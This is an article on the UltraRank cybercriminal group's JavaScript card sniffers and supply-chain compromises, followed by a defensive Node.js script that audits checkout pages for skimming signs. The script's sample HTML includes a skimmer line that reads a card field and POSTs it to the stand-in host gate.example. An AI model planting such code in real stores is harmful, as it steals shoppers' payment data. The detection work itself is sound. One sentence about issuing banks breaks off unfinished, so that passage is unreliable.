Tomcat
UltraRank has been active for 5 years: during this time, it attacked about 700 online stores in Europe, Asia, North and Latin America using JavaScript sniffers. The hackers sold the stolen data in their own card shop, earning up to 500 thousand rubles ($7,000) per day. The Group-IB study not only describes one of the most successful players in the theft and sale of bank card data, but also traces the transformation of JS sniffers from a minor into a complex threat, behind which stands a clearly segmented cybercriminal business. Since the end of 2019, having finally displaced banking Trojans, groups using JS sniffers have become the main suppliers of text databases of bank cards for sale on specialized hacker forums (card shops).
Each family of JS sniffers is a collection of samples with insignificant differences in the code, which attackers inject into a site to intercept user input: bank card numbers, names, addresses, logins, passwords, etc. JS sniffer operators choose sites running certain content management systems (CMS), as a rule ones that are rarely updated and do not use 3DSecure protection. The stolen data is sent to the attackers' server, the gate. It is then sold on the darknet on carder forums, the bulk of whose members are Russian-speaking cybercriminals. If the issuing bank that issued the card stolen by the JS sniffer has no behavioral analysis systems to distinguish the actions of a real user from those of an attacker,
UltraRank consists of Russian-speaking hackers. The group operates three families of JS sniffers, called FakeLogistics, WebRank and SnifLite, which are used to infect various online stores that accept credit card payments. Over the period of its activity, UltraRank has built an autonomous business model with its own technical and organizational structure, as well as its own system for the sale and monetization of stolen payment information. Thus, the group has its own card shop, ValidCC, whose internal statistics show that in 2019 its owners earned $5,000 - $7,000 a day on the sale of bank card data the group stole itself, and paid another $25,000 - 30,000 to other suppliers of stolen payment information who listed their goods in the card shop.
Since 2015, UltraRank has infected 691 websites, predominantly in Europe, Asia and America, according to Group-IB. But the attackers also chose larger targets, for which far more complex attacks through the supply chain were planned. Among their victims were 13 service providers for online commerce, including various advertising and browser notification services, web design agencies, marketing agencies, website developers, etc. By introducing malicious code into these providers' scripts, the attackers intercepted customer bank card data on the websites of every store that uses their products or technologies. Infecting these providers could have given the cybercriminals access to more than 100 thousand infected sites in total.
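As an added defender-side example (not code from the Group-IB report or this post), the following Node.js script audits the `<script>` tags of a checkout page for the two exposure patterns described above: third-party scripts loaded without Subresource Integrity (the supply-chain path), and inline scripts that both read form fields and contact a host outside the store's own origin (a gate). The store hostname `shop.example` and the HTML snippet are constructed assumptions.

```javascript
// Heuristic audit of <script> tags on a checkout page for JS-sniffer risk signals.
// The hostname and the sample HTML below are constructed for this example.
const FIRST_PARTY = "shop.example";

const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*"([^"]*)"/gi;
// Reads of form fields (card number, name, address inputs) ...
const FORM_READ_RE = /\b(querySelector(All)?|getElementById|getElementsByName|FormData)\s*\(|\.value\b/;
// ... combined with a way to send data off the page.
const EXFIL_RE = /\b(fetch|sendBeacon|XMLHttpRequest|new\s+Image)\b/;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) attrs[m[1].toLowerCase()] = m[2];
  return attrs;
}

// Resolve relative src values against the store origin so "/js/app.js" counts as first party.
function hostOf(url, firstParty) {
  try { return new URL(url, `https://${firstParty}/`).hostname; } catch { return null; }
}

// Returns findings as { kind, detail } objects, in document order.
function auditScripts(html, firstParty = FIRST_PARTY) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const attrs = parseAttrs(m[1]);
    const body = m[2];
    if (attrs.src) {
      const host = hostOf(attrs.src, firstParty);
      if (host && host !== firstParty && !attrs.integrity) {
        findings.push({ kind: "third-party-no-sri", detail: attrs.src });
      }
      continue;
    }
    // Inline script: flag only if it reads form fields AND talks to a foreign host.
    const foreign = [...body.matchAll(URL_RE)].map(x => x[1]).filter(h => h !== firstParty);
    if (FORM_READ_RE.test(body) && EXFIL_RE.test(body) && foreign.length > 0) {
      findings.push({ kind: "inline-form-exfil", detail: foreign.join(",") });
    }
  }
  return findings;
}

// Constructed sample checkout page: one first-party script, one pinned CDN script,
// one unpinned third-party tag, and one inline script matching the sniffer pattern.
const SAMPLE_HTML = `
<script src="/js/checkout.js"></script>
<script src="https://cdn.example/lib.js" integrity="sha384-CONSTRUCTED"></script>
<script src="https://ads.example/tag.js"></script>
<script>
  var card = document.querySelector('#card').value;
  fetch('https://gate.example/c', { method: 'POST', body: card });
</script>
`;
```

Run over a real page's HTML, the two finding kinds map directly to the mitigations: add `integrity` (and a CSP `script-src` allowlist) for every third-party script, and treat any inline script that reads payment fields and calls out to an unknown host as an incident to investigate.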